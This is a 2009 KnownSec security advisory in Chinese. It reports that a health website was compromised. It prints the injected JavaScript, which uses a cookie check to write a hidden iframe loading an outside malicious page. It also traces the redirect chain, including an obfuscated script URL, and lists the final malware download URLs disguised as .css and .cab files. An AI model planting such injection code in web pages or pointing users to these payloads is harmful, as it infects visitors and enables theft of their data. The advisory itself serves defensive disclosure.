知道创宇

发布时间：Thu Apr 30 2009 16:46:22 UTC+0800
最后更新时间：Thu Apr 30 2009 16:46:22 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 好方便健康医学网（http://www.haofangbian.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.haofangbian.com/count/counterlink.asp?style=none

网页被嵌入恶意链接代码：

var cookA = new String(document.cookie);
var Then = new Date();
var cookName = ‘9C4A4C5EF042D02′ ;
Then.setTime(Then.getTime() + 12*60*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
   {
document.write(’<iframe src=http://damx.net.cn/29.htm width=50 height=0></iframe>’);
document.cookie = “A1=”+ cookName +”;expires=”+ Then.toGMTString() +”;path=/”;
   }

挂马分析：
[wide]http://www.haofangbian.com/
 [script]http://www.haofangbian.com/count/counterlink.asp?style=none
  [script]http://www.haofangbian.com//count/+url+
  [frame]http://damx.net.cn/29.htm
   [script]http://count48.51yes.com/click.aspx?id=485576456&logo=1
   [frame]http://www.hao-game.com
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://%77%33%6f%67%2e%63%6e/%73%2e%6as
     [frame]http://27588.com.cn/a16/a16.htm
      [frame]http://27588.com.cn/a16/new.html
       [script]http://27588.com.cn/a16/../zhin.js
       [frame]http://27588.com.cn/a16/../14.htm
       [frame]http://27588.com.cn/a16/fx.htm
       [frame]http://27588.com.cn/a16/../cx.htm
       [frame]http://27588.com.cn/a16/../real10.htm
       [frame]http://27588.com.cn/a16/../real11.htm
       [script]http://27588.com.cn/a16/../wewew.js
      [script]http://s54.cnzz.com/stat.php?1d=1384534&web_id=1384534&show=pic2
      [script]http://s54.cnzz.com/stat.php?id=1384534&web_id=1384534&show=pic2
     [frame]http://pkpk.net.cn/tj.htm
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://www.hao-game.com/js/tongji.js
最终下载病毒文件：
http://37988.com.cn/as.css
http://www.19399.com.cn/bf.css
http://37988.com.cn/ms.css
http://www.19399.com.cn/mm.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]